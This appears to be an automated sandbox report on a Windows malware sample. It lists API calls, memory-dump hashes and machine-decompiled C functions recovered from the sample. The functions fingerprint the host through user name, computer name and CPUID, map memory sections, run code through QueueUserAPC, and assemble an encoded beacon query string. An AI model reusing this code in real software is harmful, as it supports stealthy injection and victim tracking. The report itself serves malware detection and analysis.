_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00381289
_snwprintf.NTDLL ref: 003812AE
CreateFileMappingW.KERNELBASE(000000FF,00384148,00000004,00000000,?,?), ref: 003812D3
GetLastError.KERNEL32 ref: 003812EA
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 003812FE
GetLastError.KERNEL32 ref: 00381316
CloseHandle.KERNEL32(00000000), ref: 0038131F
GetLastError.KERNEL32 ref: 00381327

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: d95dee744eeca0993235fc7f06ae6fb91ce33a3ad62e9950ea3d8a381316e495
Instruction ID: 703e29305d514524e5270dd48f0a432e81f15c91040888e21b3d9ea4813dafd1
Opcode Fuzzy Hash: d95dee744eeca0993235fc7f06ae6fb91ce33a3ad62e9950ea3d8a381316e495
Instruction Fuzzy Hash: C621B0F6600308BFC713BFA8DC84EAE77ADEB48751F1140A5F616D7290D6719A468B60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5DC6, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00BA5DC6(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xbad270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00BA60BE( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xbad2a0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xbad238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00BA4D95(_v8 + _v8, _t64);
							}
							HeapFree( *0xbad238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xbad238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00BA4D95(_v8 + _v8, _t64);
						}
						HeapFree( *0xbad238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x00ba5dc6
0x00ba5dce
0x00ba5dd2
0x00ba5dd5
0x00ba5dda
0x00ba5ddc
0x00ba5de1
0x00ba5de1
0x00ba5de7
0x00ba5de9
0x00ba5df6
0x00ba5e57
0x00ba5df8
0x00ba5dfd
0x00ba5e03
0x00ba5e08
0x00ba5e16
0x00ba5e1a
0x00ba5e29
0x00ba5e30
0x00ba5e37
0x00ba5e37
0x00ba5e42
0x00ba5e42
0x00ba5e1a
0x00ba5e08
0x00ba5e59
0x00ba5e5f
0x00ba5e69
0x00ba5e6b
0x00ba5e70
0x00ba5e7f
0x00ba5e83
0x00ba5e8e
0x00ba5e95
0x00ba5e9c
0x00ba5e9c
0x00ba5ea8
0x00ba5ea8
0x00ba5e83
0x00ba5eb3
0x00ba5eb5
0x00ba5eb8
0x00ba5eba
0x00ba5ebd
0x00ba5ec0
0x00ba5eca
0x00ba5ece
0x00ba5ed2

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00BA5DFD
RtlAllocateHeap.NTDLL(00000000,?), ref: 00BA5E14
GetUserNameW.ADVAPI32(00000000,?), ref: 00BA5E21
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00BA5063), ref: 00BA5E42
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00BA5E69
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00BA5E7D
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00BA5E8A
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00BA5063), ref: 00BA5EA8

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 08257785ff9623a2666a7088e46f65f1a14431120af3554b97b7931d03a2b852
Instruction ID: a99f291f74d9626bff0c788e85207729569aadbc908bb71ba79f43e992a7c5ae
Opcode Fuzzy Hash: 08257785ff9623a2666a7088e46f65f1a14431120af3554b97b7931d03a2b852
Instruction Fuzzy Hash: 1131E772A04605EFDB20DFA9DC82AAEF7F9EB49310F114569E505D7620DB70EE41DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9932, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00BA9932(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00BA8D59(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00BA677C(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00ba993f
0x00ba9940
0x00ba9941
0x00ba9942
0x00ba9943
0x00ba9947
0x00ba994e
0x00ba995d
0x00ba9960
0x00ba9963
0x00ba996a
0x00ba996d
0x00ba9970
0x00ba9973
0x00ba9976
0x00ba9981
0x00ba9983
0x00ba998c
0x00ba9994
0x00ba9996
0x00ba99a8
0x00ba99b2
0x00ba99b6
0x00ba99c5
0x00ba99c9
0x00ba99d2
0x00ba99da
0x00ba99da
0x00ba99dc
0x00ba99dc
0x00ba99e4
0x00ba99ea
0x00ba99ee
0x00ba99ee
0x00ba99f9

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00BA9979
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00BA998C
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00BA99A8

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00BA99C5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00BA99D2
NtClose.NTDLL(?), ref: 00BA99E4
NtClose.NTDLL(00000000), ref: 00BA99EE

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 1c404ea9e9bba2fb5ede724774317b86c39820dcfa24a040115b20bd5faa4ea8
Instruction ID: 3784c60f398eb540c2844abf427f1c44d40200220fe779f3d6bf4d24d718839b
Opcode Fuzzy Hash: 1c404ea9e9bba2fb5ede724774317b86c39820dcfa24a040115b20bd5faa4ea8
Instruction Fuzzy Hash: 6321F8B2A00218BFDB019F95DC86ADEBFBDEF09740F104066F905F6161DB719A459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00381DD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00381DD0(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00381812(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00381dd9
0x00381de0
0x00381de1
0x00381de2
0x00381de3
0x00381de4
0x00381df5
0x00381df9
0x00381e0d
0x00381e10
0x00381e13
0x00381e1a
0x00381e1d
0x00381e24
0x00381e27
0x00381e2a
0x00381e2d
0x00381e32
0x00381e6d
0x00381e34
0x00381e37
0x00381e3d
0x00381e42
0x00381e46
0x00381e64
0x00381e48
0x00381e4f
0x00381e5d
0x00381e5d
0x00381e46
0x00381e75

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 00381E2D

Part of subcall function 00381812: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00381E42,00000002,00000000,?,?,00000000,?,?,00381E42,00000002), ref: 0038183F

memset.NTDLL ref: 00381E4F

Strings

@, xrefs: 00381E1D

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a794f6b3bbf651d698e143c83c4cb6350bd700dc8182e4810879598b22d6ef88
Instruction ID: 28c878b48d39b80af12b25150465e6dcda76f4c610a05671c8a648d088020830
Opcode Fuzzy Hash: a794f6b3bbf651d698e143c83c4cb6350bd700dc8182e4810879598b22d6ef88
Instruction Fuzzy Hash: F0211DB2D00209AFCB11DFA9C8849DFFBB9FF48354F504469E605F7210D730AA458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00381812, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00381812(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00381824
0x0038182a
0x00381838
0x0038183f
0x00381844
0x0038184a
0x00000000
0x0038184b
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00381E42,00000002,00000000,?,?,00000000,?,?,00381E42,00000002), ref: 0038183F

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 9086e0fee3f1919084d6748b18857d988a1403134065c8b32c6e48859b356ff7
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 27F030B690030CFFEB119FA5CC85CAFBBBDEB44394B104979F152E5090D6309E499B60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA12C4, Relevance: 33.2, APIs: 22, Instructions: 248
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00BA12C4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0xbad018; // 0x9599301a
				asm("bswap eax");
				_t62 =  *0xbad014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0xbad010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0xbad00c; // 0x81762942
				asm("bswap eax");
				_t65 =  *0xbad2a4; // 0x44fa5a8
				_t3 = _t65 + 0xbae633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d13b, _t64, _t63, _t62, _t61,  *0xbad02c,  *0xbad004, _t60);
				_t68 = E00BA6B47();
				_t69 =  *0xbad2a4; // 0x44fa5a8
				_t4 = _t69 + 0xbae673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E00BA6111(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0xbad2a4; // 0x44fa5a8
					_t7 = _t130 + 0xbae8eb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0xbad238, 0, _v8);
				}
				_t74 = E00BA26A0();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0xbad2a4; // 0x44fa5a8
					_t11 = _t125 + 0xbae8f3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0xbad238, 0, _v8);
				}
				_t150 =  *0xbad324; // 0x50a95b0
				_t76 = E00BA1B77(0xbad00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					RtlFreeHeap( *0xbad238, _t156, _a16); // executed
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0xbad238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0xbad238, _t156, _v20);
						goto L26;
					}
					E00BA1BE3(GetTickCount());
					_t83 =  *0xbad324; // 0x50a95b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0xbad324; // 0x50a95b0
					__imp__(_t87 + 0x40);
					_t89 =  *0xbad324; // 0x50a95b0
					_t152 = E00BA1A30(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						HeapFree( *0xbad238, _t156, _v8);
						goto L25;
					}
					StrTrimA(_t152, 0xbac2a4);
					_t95 =  *0xbad2a4; // 0x44fa5a8
					_push(_t152);
					_t18 = _t95 + 0xbae252; // 0x616d692f
					_t97 = E00BA2773(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						HeapFree( *0xbad238, _t156, _t152);
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E00BA978C(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E00BA5BEA();
						L22:
						HeapFree( *0xbad238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E00BAA523(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_t115 = E00BA9561(_t161, _a4, _a8, _a12); // executed
						_v12 = _t115;
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E00BA677C(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E00BA6221(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00BA677C(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x00ba12c4
0x00ba12c4
0x00ba12c4
0x00ba12cd
0x00ba12d6
0x00ba12d8
0x00ba12d8
0x00ba12e5
0x00ba12f0
0x00ba12f3
0x00ba12f8
0x00ba1301
0x00ba1304
0x00ba1309
0x00ba130c
0x00ba1311
0x00ba1314
0x00ba1320
0x00ba132d
0x00ba132f
0x00ba1335
0x00ba133a
0x00ba1345
0x00ba1347
0x00ba134a
0x00ba134c
0x00ba1351
0x00ba1357
0x00ba135c
0x00ba135f
0x00ba1364
0x00ba1371
0x00ba1373
0x00ba1379
0x00ba1383
0x00ba1383
0x00ba1385
0x00ba138a
0x00ba138f
0x00ba1392
0x00ba1397
0x00ba13a4
0x00ba13a6
0x00ba13b4
0x00ba13b4
0x00ba13b6
0x00ba13c4
0x00ba13c9
0x00ba13cb
0x00ba13d0
0x00ba159f
0x00ba15a9
0x00ba15b2
0x00ba13d6
0x00ba13e2
0x00ba13e8
0x00ba13ed
0x00ba1593
0x00ba159d
0x00000000
0x00ba159d
0x00ba13f9
0x00ba13fe
0x00ba1407
0x00ba1418
0x00ba141c
0x00ba1425
0x00ba142b
0x00ba143a
0x00ba1441
0x00ba144a
0x00ba1450
0x00ba1587
0x00ba1591
0x00000000
0x00ba1591
0x00ba145c
0x00ba1462
0x00ba1467
0x00ba1468
0x00ba146f
0x00ba1474
0x00ba1479
0x00ba157d
0x00ba1585
0x00000000
0x00ba1585
0x00ba1482
0x00ba1489
0x00ba1491
0x00ba1496
0x00ba149f
0x00ba14a5
0x00ba14ac
0x00ba14b1
0x00ba14b6
0x00ba15b5
0x00ba1569
0x00ba1569
0x00ba156e
0x00ba1579
0x00ba157b
0x00000000
0x00ba157b
0x00ba14c0
0x00ba14c5
0x00ba14ca
0x00ba14cf
0x00ba14da
0x00ba14df
0x00ba14e2
0x00ba14e8
0x00ba14ee
0x00ba14f4
0x00ba14f7
0x00ba14fd
0x00ba1500
0x00ba1505
0x00ba1509
0x00ba1509
0x00ba1515
0x00ba1521
0x00ba1525
0x00ba1527
0x00ba152c
0x00ba152e
0x00ba1533
0x00ba1538
0x00ba1545
0x00ba154d
0x00ba1550
0x00ba1550
0x00ba152c
0x00000000
0x00ba1517
0x00ba151b
0x00ba1552
0x00ba1555
0x00ba155e
0x00000000
0x00000000
0x00000000
0x00000000
0x00ba155e
0x00ba151d
0x00000000
0x00ba151d
0x00ba1515

APIs

GetTickCount.KERNEL32 ref: 00BA12D8
wsprintfA.USER32 ref: 00BA1328
wsprintfA.USER32 ref: 00BA1345
wsprintfA.USER32 ref: 00BA1371
HeapFree.KERNEL32(00000000,?), ref: 00BA1383
wsprintfA.USER32 ref: 00BA13A4
HeapFree.KERNEL32(00000000,?), ref: 00BA13B4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00BA13E2
GetTickCount.KERNEL32 ref: 00BA13F3
RtlEnterCriticalSection.NTDLL(050A9570), ref: 00BA1407
RtlLeaveCriticalSection.NTDLL(050A9570), ref: 00BA1425

Part of subcall function 00BA1A30: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,00BA1EFB,?,050A95B0), ref: 00BA1A5B
Part of subcall function 00BA1A30: lstrlen.KERNEL32(?,?,?,00BA1EFB,?,050A95B0), ref: 00BA1A63
Part of subcall function 00BA1A30: strcpy.NTDLL ref: 00BA1A7A
Part of subcall function 00BA1A30: lstrcat.KERNEL32(00000000,?), ref: 00BA1A85
Part of subcall function 00BA1A30: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00BA1EFB,?,050A95B0), ref: 00BA1AA2

StrTrimA.SHLWAPI(00000000,00BAC2A4,?,050A95B0), ref: 00BA145C

Part of subcall function 00BA2773: lstrlen.KERNEL32(?,00000000,00000000,00BA1F32,616D692F,00000000), ref: 00BA277F
Part of subcall function 00BA2773: lstrlen.KERNEL32(?), ref: 00BA2787
Part of subcall function 00BA2773: lstrcpy.KERNEL32(00000000,?), ref: 00BA279E
Part of subcall function 00BA2773: lstrcat.KERNEL32(00000000,?), ref: 00BA27A9

lstrcpy.KERNEL32(00000000,?), ref: 00BA1489
lstrcpy.KERNEL32(?,?), ref: 00BA1491
lstrcat.KERNEL32(?,?), ref: 00BA149F
lstrcat.KERNEL32(?,00000000), ref: 00BA14A5

Part of subcall function 00BA978C: lstrlen.KERNEL32(?,00000000,00BAD330,00000001,00BA3435,00BAD00C,00BAD00C,00000000,00000005,00000000,00000000,?,?,?,00BA568F,00BA5073), ref: 00BA9795
Part of subcall function 00BA978C: mbstowcs.NTDLL ref: 00BA97BC
Part of subcall function 00BA978C: memset.NTDLL ref: 00BA97CE

wcstombs.NTDLL ref: 00BA1538

Part of subcall function 00BA9561: SysAllocString.OLEAUT32(?), ref: 00BA959C
Part of subcall function 00BA9561: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00BA961F

Part of subcall function 00BA677C: HeapFree.KERNEL32(00000000,00000000,00BA9161,00000000,?,?,00000000), ref: 00BA6788

HeapFree.KERNEL32(00000000,?,?), ref: 00BA1579
HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00BA1585
HeapFree.KERNEL32(00000000,?,?,050A95B0), ref: 00BA1591
HeapFree.KERNEL32(00000000,?), ref: 00BA159D
RtlFreeHeap.NTDLL(00000000,?), ref: 00BA15A9

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 603507560-0
Opcode ID: ae124681ffe497dee8c46f868e2ad39b19c0ce5ce62a770156d854a897ae9c03
Instruction ID: fd9cc7b22d34ea64c4bd6dd845a1c4a34cf3d1558575eddefafb5d7424bdab2d
Opcode Fuzzy Hash: ae124681ffe497dee8c46f868e2ad39b19c0ce5ce62a770156d854a897ae9c03
Instruction Fuzzy Hash: C8913A71900208EFCB11DFA8DC8AAAE7BF9EF5A310F144495F80AE7261DB31D951DB60

Uniqueness

Uniqueness Score: -1.00%

Function 003819C7, Relevance: 24.1, APIs: 16, Instructions: 120
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E003819C7(void* __edi, long _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				void* _v48;
				long _t25;
				int _t27;
				long _t30;
				long _t31;
				void* _t32;
				long _t35;
				long _t36;
				long _t40;
				void* _t45;
				intOrPtr _t48;
				signed int _t53;
				void* _t58;
				signed int _t61;
				void* _t64;
				intOrPtr* _t65;

				_t25 = E00381799();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					GetSystemTime( &_v24);
					_t27 = SwitchToThread();
					asm("cdq");
					_t53 = 9;
					_t61 = _t27 + (_v24.wMilliseconds & 0x0000ffff) % _t53;
					_t30 = E0038167E(__edi, _t61); // executed
					_v8 = _t30;
					Sleep(_t61 << 5); // executed
					_t31 = _v8;
				} while (_t31 == 0xc);
				if(_t31 != 0) {
					L21:
					return _t31;
				}
				_push(__edi);
				if(_a4 != 0) {
					L11:
					_t32 = CreateThread(0, 0, __imp__SleepEx,  *0x384140, 0, 0); // executed
					_t64 = _t32;
					if(_t64 == 0) {
						L18:
						_v8 = GetLastError();
						L19:
						_t31 = _v8;
						if(_t31 == 0xffffffff) {
							_t31 = GetLastError();
						}
						goto L21;
					}
					_t35 = QueueUserAPC(E0038133E, _t64,  &_v48); // executed
					if(_t35 == 0) {
						_t40 = GetLastError();
						_a4 = _t40;
						TerminateThread(_t64, _t40);
						CloseHandle(_t64);
						_t64 = 0;
						SetLastError(_a4);
					}
					if(_t64 == 0) {
						goto L18;
					} else {
						_t36 = WaitForSingleObject(_t64, 0xffffffff);
						_v8 = _t36;
						if(_t36 == 0) {
							GetExitCodeThread(_t64,  &_v8);
						}
						CloseHandle(_t64);
						goto L19;
					}
				}
				if(E00381C6E(_t53,  &_a4) != 0) {
					 *0x384138 = 0;
					goto L11;
				}
				_t65 = __imp__GetLongPathNameW;
				_t45 =  *_t65(_a4, 0, 0); // executed
				_t58 = _t45;
				if(_t58 == 0) {
					L9:
					 *0x384138 = _a4;
					goto L11;
				}
				_t14 = _t58 + 2; // 0x2
				_t48 = E00381669(_t58 + _t14);
				 *0x384138 = _t48;
				if(_t48 == 0) {
					goto L9;
				}
				 *_t65(_a4, _t48, _t58); // executed
				E00381E78(_a4);
				goto L11;
			}

0x003819ce
0x003819d5
0x003819da
0x00381b0a
0x00381b0a
0x003819e1
0x003819e5
0x003819eb
0x003819f9
0x003819fa
0x003819fd
0x00381a00
0x00381a09
0x00381a0c
0x00381a12
0x00381a15
0x00381a1c
0x00381b07
0x00000000
0x00381b07
0x00381a22
0x00381a26
0x00381a7c
0x00381a8c
0x00381a92
0x00381a9c
0x00381af7
0x00381af9
0x00381afc
0x00381afc
0x00381b03
0x00381b05
0x00381b05
0x00000000
0x00381b03
0x00381aa8
0x00381ab6
0x00381ab8
0x00381abc
0x00381abf
0x00381ac6
0x00381acb
0x00381acd
0x00381acd
0x00381ad5
0x00000000
0x00381ad7
0x00381ada
0x00381ae0
0x00381ae5
0x00381aec
0x00381aec
0x00381af3
0x00000000
0x00381af3
0x00381ad5
0x00381a33
0x00381a76
0x00000000
0x00381a76
0x00381a35
0x00381a40
0x00381a42
0x00381a46
0x00381a6c
0x00381a6f
0x00000000
0x00381a6f
0x00381a48
0x00381a4d
